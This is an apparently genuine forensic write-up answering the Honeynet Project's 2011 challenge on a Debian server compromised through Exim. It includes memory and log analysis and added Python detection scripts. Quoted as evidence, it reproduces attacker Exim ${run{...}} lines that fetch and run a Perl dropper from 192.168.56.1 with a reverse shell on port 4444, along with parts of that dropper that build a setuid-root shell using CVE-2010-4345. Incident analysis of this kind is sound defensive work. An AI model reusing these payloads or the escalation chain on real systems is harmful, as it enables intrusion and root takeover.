THE HONEYNET PROJECT® | Forensic Challenge 2011

Challenge 7: Forensic Analysis of a Compromised Server (simple)

Submission Template

Submit your solution at http://www.honeynet.org/challenge2010/ by 17:00 EST, Thursday, March 30th 2011. Results will be released around the third week of April.

Name (required): Kevin Mau / Email (required):
Country (optional): / Profession (optional):
_ Student
X Security Professional
_ Other
Question 1. What service and what account triggered the alert? / Possible Points: 1pt
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 1.
Service: Exim
Account: Debian-exim
Exim was exploited, which caused /var/log/exim4/paniclog to be written to; a non-empty paniclog is a strong indicator that something was wrong and needed to be reviewed.
The /var/log/exim4 directory and the files under it are owned by the Debian-exim user. A review of the memory dump with Volatility shows the exim process running as UID 101, which maps back to the Debian-exim account in /etc/passwd.
Volatility memory dump (linux_task_list_psaux):
Arguments Pid Uid
/usr/sbin/exim4 -bd -q30m 1942 101
/etc/passwd:
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
Question 2. What kind of system runs on targeted server? (OS, CPU, etc) / Possible Points: 1pt
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 2.
The following files were reviewed to gather information on the server.
/var/log/dmesg
/var/log/syslog
/etc/fstab
/boot/grub/menu.lst
The system has the following configuration:
Debian lenny (5.0), kernel 2.6.26 (Debian package version 2.6.26-25lenny), running as a VirtualBox guest
single 1.4 GHz processor
Intel e1000 NIC
1 GB disk /dev/sda, partitioned as sda1 (/) and sda5 (swap)
256 MB of RAM
Question 3. What processes were running on targeted server? / Possible Points: 2pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 3.
Downloaded the latest Linux version of Volatility using the following command:
svn checkout http://volatility.googlecode.com/svn/branches/linux-support volatility-linux
Ran the following command to list the processes in the memory dump:
python volatility.py --profile=debian2626 linux_task_list_psaux -f /download/Victoria-v8.memdump.img
Arguments Pid Uid
init [2] 1 0
[kthreadd] 2 0
[migration/0] 3 0
[ksoftirqd/0] 4 0
[watchdog/0] 5 0
[events/0] 6 0
[khelper] 7 0
[kblockd/0] 39 0
[kacpid] 41 0
[kacpi_notify] 42 0
[kseriod] 86 0
[pdflush] 123 0
[pdflush] 124 0
[kswapd0] 125 0
[aio/0] 126 0
[ksuspend_usbd] 581 0
[khubd] 582 0
[ata/0] 594 0
[ata_aux] 595 0
[scsi_eh_0] 634 0
[kjournald] 700 0
udevd --daemon 776 0
[kpsmoused] 1110 0
/sbin/portmap 1429 1
/sbin/rpc.statd 1441 102
dhclient3 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0 1624 0
/usr/sbin/rsyslogd -c3 1661 0
/usr/sbin/acpid 1672 0
/usr/sbin/sshd 1687 0
/usr/sbin/exim4 -bd -q30m 1942 101
/usr/sbin/cron 1973 0
/bin/login -- 1990 0
/sbin/getty 38400 tty2 1992 0
/sbin/getty 38400 tty3 1994 0
/sbin/getty 38400 tty4 1996 0
/sbin/getty 38400 tty5 1998 0
/sbin/getty 38400 tty6 2000 0
-bash 2042 0
sh 2065 0
memdump 2168 0
nc 192.168.56.1 8888 2169 0
Two things stand out in this list. sh (PID 2065) is running as UID 0, although exim4 (PID 1942), the service that was exploited, runs as UID 101 (Debian-exim), so a root shell is already visible here. And memdump (PID 2168) feeding nc to 192.168.56.1:8888 is most likely the memory acquisition that produced this very image, so those two processes are the examiner's rather than the attacker's.
Question 4. What are attackers IP and target IP addresses? / Possible Points: 2pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 4.
The following logs were reviewed to determine the attacker's IP:
/var/log/exim4/mainlog
/var/log/exim4/rejectlog
/var/log/auth.log
/var/log/syslog
/var/lib/dhcp3/dhclient.eth0.leases
Victoria-v8.memdump.img
The mainlog and rejectlog show mail being sent from the attacker at 192.168.56.1 and 192.168.56.101.
The auth.log also shows repeated SSH login attempts from the attacker at 192.168.56.1.
Using Volatility to analyze the memory dump, we can see established connections from the target IP 192.168.56.102 to the attacker's IP 192.168.56.1 on ports 4444 and 8888. The 4444 connection is held by a shell (sh, PID 2065) and matches the reverse-shell port passed to c.pl in the exploit payload. The 8888 connection belongs to nc (PID 2169), which sits next to memdump (PID 2168) in the process list; that looks like the memdump | nc pipeline that captured this image, so port 8888 is most likely the acquisition channel to the host rather than attacker traffic, even though it goes to the same address.
We can also use Volatility to determine the MAC addresses of the hosts the attacks came from:
192.168.56.1 0a:00:27:00:00:00
192.168.56.101 08:00:27:28:5a:cc
192.168.56.0/24 is VirtualBox's default host-only network. 08:00:27 is the VirtualBox OUI, so 192.168.56.101 is another VirtualBox guest, and 0a:00:27:00:00:00 is the address VirtualBox gives the host-only adapter on the hypervisor host, so 192.168.56.1 is the host machine itself.
Analyzing syslog we can determine that the address received via DHCP was 192.168.56.102.
The DHCP leases file /var/lib/dhcp3/dhclient.eth0.leases confirms that 192.168.56.102 was handed out to this server.
Question 5. What service was attacked? / Possible Points: 1pt
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 5.
Exim was attacked. All of the log files in /var/log were reviewed, and the Exim logs showed strange behaviour:
/var/log/exim4/mainlog
/var/log/exim4/rejectlog
/var/log/exim4/paniclog
In the mainlog several mail items contained shell commands you would not normally see in a mail log. The ${run{...}} fragments are Exim string expansions: the exploit overwrote the ACL that Exim evaluates for the MAIL command with them, so when Exim expanded the ACL the embedded wget/perl command was executed as the Debian-exim user. The text before each ${run{ is the tail of an earlier copy of the same payload, which shows the heap was filled with repeated copies of it. Exim logged the ACL string because its expansion ultimately failed:
2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <>: failed to expand ACL string "pl 192.168.56.1 4444; sleep 1000000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}
2011-02-06 15:14:41 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <>: failed to expand ACL string "00000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/82.txt -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
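As an added example (not part of the original submission or of the challenge materials), the following Python scanner pulls the same indicators out of Exim log lines automatically: the sending host, every ${run{...}} expansion, the URLs fetched, where wget drops them, the callback address, and the arguments handed to the downloaded script, which also exposes the invocation that ran c.pl with no host/port. The sample log is constructed from the two lines quoted above plus one benign receipt line; the message ID, sender and 10.0.0.5 address in that third line are made up.

```python
import re

# Constructed sample log: the two injected lines quoted above plus one benign
# receipt line (made-up message ID, sender and address), so this runs offline.
SAMPLE_LOG = r"""2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <>: failed to expand ACL string "pl 192.168.56.1 4444; sleep 1000000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}
2011-02-06 15:14:41 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <>: failed to expand ACL string "00000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/82.txt -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
2011-02-06 15:20:00 1PmcB4-0000ZD-3o <= bob@example.org H=(mail.example.org) [10.0.0.5] P=esmtp S=1234
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<rest>.*)$")
HOST_RE = re.compile(r"H=\((?P<helo>[^)]*)\) \[(?P<ip>[0-9.]+)\]")
RUN_RE = re.compile(r"\$\{run\{(?P<cmd>.*?)\}\}")          # Exim ${run{...}} expansion
URL_RE = re.compile(r"https?://[^\s'\"]+")
DROP_RE = re.compile(r"-O\s+([^\s;'\"]+)")                  # wget -O <path>
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
PERL_RE = re.compile(r"perl\s+(?P<script>\S+)\s*(?P<args>[^;'\"]*)")


def scan_exim_log(text):
    """Return one record per log line that carries a ${run{...}} expansion.

    Exim only logs an ACL string when its expansion fails, and no sane
    configuration embeds ${run{...}} in an ACL, so its presence in
    mainlog/rejectlog means attacker-supplied text reached the expander.
    """
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        run = RUN_RE.search(rest)
        if run is None:
            continue                      # ordinary delivery/receipt line
        cmd = run.group("cmd")
        host = HOST_RE.search(rest)
        perl = PERL_RE.search(cmd)
        hits.append({
            "time": m.group("ts"),
            "helo": host.group("helo") if host else None,
            "sender_ip": host.group("ip") if host else None,
            "command": cmd,
            "urls": URL_RE.findall(cmd),
            "drop_paths": DROP_RE.findall(cmd),
            "callback_ips": sorted(set(IPV4_RE.findall(cmd))),
            # Arguments handed to the downloaded script; an empty string means
            # the dropper was run without its host/port and would have died.
            "perl_args": perl.group("args").strip() if perl else None,
            "expansion_failed": "failed to expand ACL string" in rest,
        })
    return hits


def attacker_infrastructure(hits):
    """Every address on the attacker side: SMTP sources and callback hosts."""
    addrs = set()
    for h in hits:
        if h["sender_ip"]:
            addrs.add(h["sender_ip"])
        addrs.update(h["callback_ips"])
    return sorted(addrs)


if __name__ == "__main__":
    found = scan_exim_log(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["sender_ip"], "->", h["urls"], "args:", repr(h["perl_args"]))
    print("attacker addresses:", attacker_infrastructure(found))
```

Run it against the real mainlog and rejectlog from the mounted image instead of SAMPLE_LOG; the `perl_args` field is what separates the working invocation (host and port given) from the one that could not have connected back.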
Question 6. What attacks were launched against targeted server? / Possible Points: 2pt
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 6.
Multiple remote code execution attempts were launched against the server; some of them succeeded and others failed. One of the successful commands is listed below:
${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}
A privilege escalation exploit was then run on the server to obtain root; the most relevant section of the downloaded c.pl is listed below:
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
Question 7. What flaws or vulnerabilities did he exploit? / Possible Points: 2pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 7.
Based on the information in the log files and a little Google-fu, the following was found.
A remote code execution vulnerability (CVE-2010-4344, a heap overflow in Exim's string formatting code that lets a remote sender run commands as the Debian-exim user; fixed for Debian in DSA-2131) was used to attack this server:
http://www.debian.org/security/2010/dsa-2131
http://security-tracker.debian.org/tracker/CVE-2010-4344
A privilege escalation vulnerability (CVE-2010-4345: Exim accepted an alternative configuration file passed with -C by the Exim user and processed it with root privileges, so ${run{...}} expansions in that file ran as root) was then used to gain root:
http://security-tracker.debian.org/tracker/CVE-2010-4345
Question 8. Were the attacks successful? Did some fail? / Possible Points: 2pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 8.
Yes, some of the attacks were successful; the files downloaded to the system during the attack still exist:
/tmp/c.pl
/tmp/rk.tar
The attack below would have failed because c.pl was invoked without the host and port it needs: the script dies unless it is given exactly two arguments.
run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/82.txt -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
The attempts below would have failed because the injected commands ran as the Debian-exim user rather than root, so they could not overwrite /etc/passwd or run useradd. The first one was never executed at all: it was sent as a raw SMTP command, which Exim did not recognise and dropped.
2011-02-06 15:15:04 SMTP call from [192.168.56.1] dropped: too many unrecognized commands (last was "cat "ulysses:x:00:00:Ulysses:/home/ulysses:/bin/sh" > /etc/passwd")
HeaderX: ${run{/bin/sh -c "exec /bin/sh -c 'useradd --gid root --create-home --password 0 0mkpasswd -H md5 Ulyss3s) ulysses'"}}
Question 9. What did the attacker obtain with attacks? / Possible Points: 2pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 9.
The attacker was able to download and remotely execute code on the server as the Debian-exim user, used that code to open a reverse shell, and then escalated to root with the setuid helper that the script builds:
/tmp/c.pl
The following rootkit was also downloaded, but it does not appear to have been installed:
/tmp/rk.tar
Question 10. Did the attacker download files? Which ones? Give a quick analysis of those files. / Possible Points: 3pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 10.
The attacker downloaded c.pl and rk.tar.
c.pl does a few things.
It opens a reverse shell to the attacker on the host and port given as its two arguments (the values passed on the command line in the exploit payload):
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
It writes s.c, a tiny wrapper that switches to UID/GID 0 and execs /bin/sh, to /var/spool/exim4:
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;
The script then compiles s.c:
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
The script then writes e.conf and launches Exim with it as an alternative configuration file (exim -C). Exim is setuid root, and versions before 4.73 accepted -C from the Exim user without dropping root privileges (CVE-2010-4345), so the ${run{...}} expansions embedded in the spool_directory option run as root: they chown s to root:root and set it mode 4755. Executing /var/spool/exim4/s then yields a root shell over the reverse-shell connection that is already open.
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);
rk.tar is the SHV5 rootkit. It replaces several system utilities such as netstat, mv, ls, cp and kill with trojanized versions and marks them immutable so they cannot easily be removed. Based on the install scripts and on MD5 hashes of the corresponding binaries on the image, this rootkit does not appear to have been installed on the compromised system.
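As an added example (not the author's code and not part of c.pl), here is a small static triage for a Perl dropper of this kind. It lists the files the script writes, the shell commands it runs, the Exim ${run{...}} expansions it embeds, and recognises the CVE-2010-4345 chain described above: a config file written by the script, fed to exim -C, with an expansion that chmods a freshly compiled helper setuid, which the script then executes. The sample input is stitched from the c.pl fragments quoted in this answer (with the C helper abbreviated) and is not the full c.pl from the image.

```python
import re

# Constructed sample: the c.pl fragments quoted above, stitched together with
# the C helper abbreviated, so the triage runs offline. Not the full c.pl.
SAMPLE_CPL = r'''
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
int main(int argc, char *argv[]) { setuid(0); setgid(0); execl("/bin/sh", "sh", NULL); }
};
close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
'''

WRITE_RE = re.compile(r'open\s+\w+\s*,\s*"\s*>{1,2}\s*([^"]+)"')    # open FILE, ">path"
SYSTEM_RE = re.compile(r'system\s*\(\s*"((?:[^"\\]|\\.)*)"\s*\)')   # system("...")
EXIM_RUN_RE = re.compile(r'\\?\$\{run\{([^}]*)\}\}')                  # ${run{cmd}} in config text
GCC_OUT_RE = re.compile(r'\bgcc\b.*?-o\s+(\S+)')                      # gcc ... -o <binary>
ALT_CONF_RE = re.compile(r'^exim\b.*?-C\s*(\S+)')                     # exim -C<config>
SETUID_RE = re.compile(r'chmod\s+[4-7][0-7]{3}\s+([^\s}]+)')          # mode with setuid/setgid bit
USAGE_RE = re.compile(r'Usage:\s*\$0\s*([^"\\]*)')


def triage_perl_dropper(src):
    """Static summary of what a Perl dropper writes, runs and escalates with."""
    files_written = WRITE_RE.findall(src)
    shell_cmds = []
    for call in SYSTEM_RE.findall(src):
        shell_cmds += [c.strip() for c in call.split(";") if c.strip()]
    exim_expansions = EXIM_RUN_RE.findall(src)

    gcc_outputs = [m.group(1) for m in map(GCC_OUT_RE.search, shell_cmds) if m]
    alt_configs = [m.group(1) for m in map(ALT_CONF_RE.search, shell_cmds) if m]
    setuid_targets = [m.group(1)
                      for m in map(SETUID_RE.search, exim_expansions + shell_cmds) if m]

    # CVE-2010-4345 pattern: the script writes a config, hands it to exim -C,
    # and a ${run{...}} inside it chmods a helper the script just compiled
    # setuid root, after which the script runs that helper.
    privesc_chain = (
        bool(set(alt_configs) & set(files_written))
        and bool(set(setuid_targets) & set(gcc_outputs))
        and any(c in setuid_targets for c in shell_cmds)
    )
    usage = USAGE_RE.search(src)
    return {
        "files_written": files_written,
        "shell_commands": shell_cmds,
        "exim_expansions": exim_expansions,
        "exim_alt_configs": alt_configs,
        "compiled_binaries": gcc_outputs,
        "setuid_targets": setuid_targets,
        "privesc_chain": privesc_chain,
        "usage": usage.group(1).strip() if usage else None,
    }


if __name__ == "__main__":
    for key, value in triage_perl_dropper(SAMPLE_CPL).items():
        print(f"{key}: {value}")
```

Point it at the real /tmp/c.pl from the mounted image; the `files_written` list is also the list of artefacts to look for on disk (here /var/spool/exim4/s is the one that survived, since s.c and e.conf are removed by the script itself).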
Question 11. What can you say about the attacker? (Motivation, skills, etc) / Possible Points: 2pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 11.
The attacker seemed motivated to persist on the target: while they did not install the rootkit to further compromise the host, its presence suggests persistence was the goal, whether to turn the server into a bot, a warez dump, or some other misuse of its services.
Skill-wise the attacker was a complete amateur: files such as c.pl, rk.tar and s were left on the file system, the paniclog was not cleared, and the rootkit that would have helped cover their tracks was never installed. The attack failed several times, seemingly while the attacker was working out how to use the publicly available exploit code.
Question 12. Do you think these attacks were automated? Why? / Possible Points: 1pt
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 12.
No, I don't think these attacks were automated; there were far too many failures and too much time in between attacks. Typically with the automated attacks I've seen in the past, failures are less common unless everything fails. Also, the attacks were at seemingly random time intervals; most automated attacks will continue to attack at set time intervals.
Question 13. What could have prevented the attacks? / Possible Points: 2pts
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer 13.
The remote code execution vulnerability affects Exim 4.69 and earlier. Had the exim4 package been kept current (the fix is in 4.70 upstream, and Debian shipped it for lenny in DSA-2131), this would not have occurred.
4.69 was released in January of 2008
4.70 was released in November of 2009
The privilege escalation vulnerability affects Exim 4.72 and earlier. Keeping the package current would have prevented further compromise via this avenue; 4.73 closed it by only honouring -C from the Exim user for configuration files listed at build time in TRUSTED_CONFIG_LIST.
4.73 was released in January of 2011
The network or server administrator could also have blocked new outbound connections from the server (egress filtering). That would have stopped the reverse shell from connecting back, and the downloads of c.pl and rk.tar with it. Running Exim in a chroot or similar jail would have confined the Debian-exim user to an isolated environment and kept a rootkit from touching the host's own binaries.
Bonus. From memory image, can you say what network connections were opened and in which state ?
Tools Used: SIFT toolkit, Volatility, native Linux commands (mount, cat, grep, etc.)
Awarded Points:
Answer Bonus.
Using the Volatility toolkit we can run the following command to extract the network connections that were open at the time of the memory dump:
python volatility.py --profile=debian2626 linux_netstat -f /download/Victoria-v8.memdump.img
UDP 0.0.0.0:111 0.0.0.0:0 portmap/1429
TCP 0.0.0.0:111 0.0.0.0:0 LISTEN portmap/1429
UDP 0.0.0.0:769 0.0.0.0:0 rpc.statd/1441
UDP 0.0.0.0:38921 0.0.0.0:0 rpc.statd/1441
TCP 0.0.0.0:39296 0.0.0.0:0 LISTEN rpc.statd/1441
UDP 0.0.0.0:68 0.0.0.0:0 dhclient3/1624
UNIX /dev/log
UNIX /var/run/acpid.socket
TCP 0000:0000:0000:0000:0000:0000:0000:0000:22 0000:0000:0000:0000:0000:0000:0000:0000:0 LISTEN sshd/1687
TCP 0.0.0.0:22 0.0.0.0:0 LISTEN sshd/1687
TCP 0000:0000:0000:0000:0000:0000:0000:0000:25 0000:0000:0000:0000:0000:0000:0000:0000:0 LISTEN exim4/1942
TCP 0.0.0.0:25 0.0.0.0:0 LISTEN exim4/1942
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
TCP 192.168.56.102:56955 192.168.56.1:8888 ESTABLISHED nc/2169
Summary: the only listeners are portmap (111), rpc.statd, sshd (22) and exim4 (25). Two connections were ESTABLISHED at acquisition time. The first, 192.168.56.102:43327 to 192.168.56.1:4444, is held by sh (PID 2065, UID 0) and is listed three times because linux_netstat prints one line per file descriptor: the socket is duplicated onto stdin, stdout and stderr, which is how a reverse shell is wired up. The second, 192.168.56.102:56955 to 192.168.56.1:8888, is held by nc (PID 2169), the memdump | nc pipeline that captured this image. The same shell also holds, on two descriptors, the SMTP connection 192.168.56.102:25 from 192.168.56.101:37202 in state CLOSE: that is the attacking SMTP session itself, inherited from the exim child that ran the injected ${run{...}} command, which ties PID 2065 directly to the exploit. A shell with UID 0 descending from an exim4 daemon running as UID 101 is consistent with the setuid helper s having been run.
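As an added example (not part of the submission), the following Python correlates the psaux and netstat listings: it collapses linux_netstat's one-line-per-descriptor output into one entry per socket with a descriptor count, attaches the owning UID from the process list, and flags shell-like processes holding TCP sockets, including the three-descriptor layout of a reverse shell and a non-listening socket sitting on another daemon's listening port, which means the shell inherited it from that daemon. Both samples are excerpts of the output quoted in this submission.

```python
from collections import Counter

# Constructed excerpts of the linux_task_list_psaux and linux_netstat output
# quoted in this submission, embedded so the correlation runs offline.
SAMPLE_PSAUX = """Arguments Pid Uid
/usr/sbin/sshd 1687 0
/usr/sbin/exim4 -bd -q30m 1942 101
-bash 2042 0
sh 2065 0
memdump 2168 0
nc 192.168.56.1 8888 2169 0
"""

SAMPLE_NETSTAT = """UDP 0.0.0.0:111 0.0.0.0:0 portmap/1429
UNIX /dev/log
TCP 0000:0000:0000:0000:0000:0000:0000:0000:22 0000:0000:0000:0000:0000:0000:0000:0000:0 LISTEN sshd/1687
TCP 0.0.0.0:22 0.0.0.0:0 LISTEN sshd/1687
TCP 0.0.0.0:25 0.0.0.0:0 LISTEN exim4/1942
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
TCP 192.168.56.102:56955 192.168.56.1:8888 ESTABLISHED nc/2169
"""

# Process names that have no business holding a TCP connection on a mail server.
SHELL_LIKE = {"sh", "bash", "dash", "nc", "perl", "python"}


def parse_psaux(text):
    """pid -> {'args', 'uid'} from the 'Arguments Pid Uid' table (last two columns)."""
    procs = {}
    for line in text.splitlines():
        parts = line.rsplit(None, 2)
        if len(parts) != 3 or not parts[1].isdigit():
            continue                          # header or blank line
        args, pid, uid = parts
        procs[int(pid)] = {"args": args, "uid": int(uid)}
    return procs


def parse_netstat(text):
    """One entry per line; linux_netstat prints a line per file descriptor."""
    entries = []
    for line in text.splitlines():
        tok = line.split()
        if not tok or tok[0] not in ("TCP", "UDP"):
            continue                          # UNIX sockets, blank lines
        if tok[0] == "TCP" and len(tok) == 5:
            local, remote, state, owner = tok[1:]
        elif tok[0] == "UDP" and len(tok) == 4:
            local, remote, owner = tok[1:]
            state = "-"
        else:
            continue
        name, pid = owner.rsplit("/", 1)
        entries.append({"proto": tok[0], "local": local, "remote": remote,
                        "state": state, "process": name, "pid": int(pid)})
    return entries


def port_of(addr):
    return int(addr.rsplit(":", 1)[1])      # works for the IPv6 form as well


def suspicious_sockets(procs, entries):
    """Collapse per-fd lines and flag shell-like processes holding TCP sockets."""
    refs = Counter((e["proto"], e["local"], e["remote"], e["state"],
                    e["process"], e["pid"]) for e in entries)
    listeners = {port_of(e["local"]): e["process"]
                 for e in entries if e["state"] == "LISTEN"}
    findings = []
    for (proto, local, remote, state, name, pid), n in refs.items():
        if proto != "TCP" or state == "LISTEN" or name not in SHELL_LIKE:
            continue
        owner = listeners.get(port_of(local))
        findings.append({
            "process": name, "pid": pid,
            "uid": procs.get(pid, {}).get("uid"),
            "local": local, "remote": remote, "state": state,
            "fd_refs": n,
            # The same socket on three descriptors means stdin/stdout/stderr
            # were dup'd onto it: the classic reverse-shell layout.
            "reverse_shell_stdio": state == "ESTABLISHED" and n >= 3,
            # A non-listening socket on another daemon's listening port was
            # inherited from that daemon, i.e. the shell was spawned by it.
            "inherited_from_listener": owner if owner and owner != name else None,
        })
    return findings


if __name__ == "__main__":
    ps = parse_psaux(SAMPLE_PSAUX)
    for f in suspicious_sockets(ps, parse_netstat(SAMPLE_NETSTAT)):
        print(f)
```

Feed it the full output of both Volatility plugins; on this image the three findings are the root reverse shell on 4444, the closed SMTP session that shell inherited from exim4, and the examiner's nc to 8888.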

The work is licensed under a Creative Commons License.

Copyright © The Honeynet Project, 2010
